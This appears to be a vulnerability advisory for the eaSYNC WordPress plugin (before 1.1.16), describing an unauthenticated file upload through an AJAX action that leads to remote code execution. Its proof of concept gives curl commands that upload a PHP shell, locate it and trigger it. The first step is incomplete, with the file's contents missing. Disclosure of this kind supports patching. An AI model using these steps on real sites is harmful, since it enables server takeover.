eaSYNC < 1.1.16 - Unauthenticated Arbitrary File Upload

The plugin suffers from insufficient input validation which leads to arbitrary file upload and subsequently to remote code execution. An AJAX action accessible to unauthenticated users is affected by this issue. An allowlist of valid file extensions is defined but is not used during the validation steps.

PoC

1. Create a malicious PHP file: echo ’ /tmp/evil.php 2. Upload it curl -H ‘Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37’ \ -F ‘action=easync_session_store’ \ -F ‘type=car’ \ -F ‘with_driver=self-driven’ \ -F ‘driver_license_image2=@/tmp/evil.php’ \ ‘http://127.0.0.1/wp-admin/admin-ajax.php’ 3. Determine the location where the shell has been uploaded (the “d_license_image” should contain the URL to it): curl -H ‘Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37’ \ ‘http://127.0.0.1/wp-admin/admin-ajax.php?action=easync_success_and_save’ 4. Trigger the payload by accessing the determined URL, e.g: http://127.0.0.1/wp-content/uploads/cff7779bf2268f97c011ece9fd4c9ab0.php